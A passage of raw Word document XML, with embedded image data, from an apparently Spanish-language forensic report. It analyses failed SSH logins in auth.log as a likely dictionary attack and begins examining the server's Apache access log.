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wzTtelME&#10;AAATDAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEAXmLD&#10;mXrZAQB62QEAFAAAAAAAAAAAAAAAAAC5BgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAKAAAA&#10;AAAAACEAl0yrIZJOAACSTgAAFAAAAAAAAAAAAAAAAABl4AEAZHJzL21lZGlhL2ltYWdlMi5wbmdQ&#10;SwECLQAUAAYACAAAACEA4euWfOEAAAAJAQAADwAAAAAAAAAAAAAAAAApLwIAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAANzACAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAAMzECAAAA&#10;">
                <v:group id="Grupo 115" o:spid="_x0000_s1190" style="position:absolute;width:60794;height:17265" coordsize="60796,17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00nyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NasJA&#10;EL4X+g7LFLzVTYyVmLqKSFt6kEJVEG9DdkyC2dmQXZP49m6h4HG+/1msBlOLjlpXWVYQjyMQxLnV&#10;FRcKDvvP1xSE88gaa8uk4EYOVsvnpwVm2vb8S93OFyKEsMtQQel9k0np8pIMurFtiAN3tq1BH862&#10;kLrFPoSbWk6iaCYNVhwaSmxoU1J+2V2Ngq8e+3USf3Tby3lzO+3ffo7bmJQavQzrdxCeBv8Q/7u/&#10;dZifpLNkksbzKfz9FACQyzsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAbANNJ8kAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:shape id="Imagen 85" o:spid="_x0000_s1191" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente con confianza media" style="position:absolute;width:32194;height:17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eQXygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9RS8Mw&#10;FIXfhf2HcAXfXNquG1qXDREGVZ+2+QMuzbWpJjddk3XVX28EwcfDOec7nPV2claMNITOs4J8noEg&#10;brzuuFXwdtzd3oEIEVmj9UwKvijAdjO7WmOl/YX3NB5iKxKEQ4UKTIx9JWVoDDkMc98TJ+/dDw5j&#10;kkMr9YCXBHdWFlm2kg47TgsGe3oy1Hwezk5B97Ernk1hi9e9Dcd6yS/1+H1S6uZ6enwAEWmK/+G/&#10;dq0VLMryPi9X+RJ+L6U7IDc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGDd5BfKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId218" o:title="Texto&#10;&#10;Descripción generada automáticamente con confianza media"/>
                  </v:shape>
                  <v:shape id="Imagen 110" o:spid="_x0000_s1192" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:33027;width:27769;height:17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7XVxgAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NagIx&#10;EL4X+g5hBC+lJtVi3dUoRRA8tuqhx2Ez3axuJstmqtu3bwqFHuf7n9VmCK26Up+ayBaeJgYUcRVd&#10;w7WF03H3uACVBNlhG5ksfFOCzfr+boWlizd+p+tBapVDOJVowYt0pdap8hQwTWJHnLnP2AeUfPa1&#10;dj3ecnho9dSYuQ7YcG7w2NHWU3U5fAULF+keTnvvTDwfZ+e3hYTqownWjkfD6xKU0CD/4j/33uX5&#10;hXmZFfPiuYDfnzIAev0DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEANQ+11cYAAADjAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                    <v:imagedata r:id="rId219" o:title="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1193" type="#_x0000_t202" style="position:absolute;left:3189;top:17538;width:57576;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AyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Pa8Iw&#10;FL8P9h3CG3gZM1FrlWoUkQ02L7LOi7fQPJtuzUtJUu2+/TIY7Ph+/996O9iWXdGHxpGEyVgAQ6qc&#10;bqiWcPp4eVoCC1GRVq0jlPCNAbab+7u1KrS70Ttey1izFEKhUBJMjF3BeagMWhXGrkNK3MV5q2I6&#10;fc21V7cUbls+FSLnVjWUGozqcG+w+ip7K+GYnY/msb88H3bZzL+d+n3+WZdSjh6G3QpYxCH+i//c&#10;rzrNn09EJuaLWQ6/PyUA+OYHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAvPvlQMkAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5E6E4F50" w14:textId="5D8DA441" w:rsidR="00756E4A" w:rsidRPr="006D7C69" w:rsidRDefault="00756E4A" w:rsidP="00756E4A">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>50</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="129" w:name="_Toc155782617"/>
                        <w:r w:rsidRPr="00577A27">
                          <w:t>Comando grep “user” auth.log y prueba de instalación del Sistema Operativo.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="129"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se puede considerar que desde el 31 de diciembre hasta el 03 de enero se ha realizado intentos masivos de acceso con usuario no inválidos. Parece que ha tenido que hacerse con un ataque de intento de acceso a través de un diccionario de usuario posiblemente predefinidos en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156140D6" w14:textId="6D4E41A0" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relativo a la información obtenida y los datos que podemos sacar de ellos. Cabe destacar que este archivo de registro es de autenticaciones fallidas, cabe destacar </w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">también que este cloud server tiene una </w:t>
      </w:r>
      <w:r w:rsidR="00BB381F" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dedicada, y en los fueros es conocido la gran cantidad de bots de otros países que tratan de manera continua acceder a este tipo de servidores. De </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hecho,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compañeros míos, durante su etapa la universidad, no es de extrañar que se hayan avisado desde los SOC de que han tenido que cortar la conexión a internet por intentos de acceso desde direcciones IP registradas en </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Shanghái</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797EF57B" w14:textId="454C7EC2" w:rsidR="00A703AB" w:rsidRPr="00857943" w:rsidRDefault="0003692D" w:rsidP="0003692D">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00857943">
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00857943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00857943">
        <w:t>ccess</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00857943">
        <w:t>log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A135B" w14:textId="0D626DB1" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ya que tenemos detectado del análisis de la memoria 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A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que el error viene del servicio de apache2, vamos a </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buscar</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en sus logs. Personalmente creo que es considerable estar enfocados en ese sentido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56310304" w14:textId="7C78B298" w:rsidR="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por tanto, para buscar los accesos a apache, debemos ir a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y ver las acciones realizadas sobre el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547576D" w14:textId="57A55A40" w:rsidR="00BB27B6" w:rsidRPr="00A703AB" w:rsidRDefault="009A067C" w:rsidP="009A067C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251827200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="633B4BD7" wp14:editId="62009A81">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4386</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10573</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5394459" cy="1400175"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="253621902" name="Grupo 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5394459" cy="1400175"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5394459" cy="1400175"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1037508676" name="Imagen 86"/>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bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3600450" cy="1400175"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="60166819" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3997459" y="361507"/>
                            <a:ext cx="1397000" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4A36D651" w14:textId="176392EA" w:rsidR="00B20FD9" w:rsidRPr="00EE3377" w:rsidRDefault="00B20FD9" w:rsidP="00B20FD9">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>51</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="130" w:name="_Toc155782618"/>
                              <w:r w:rsidRPr="00DE2791">
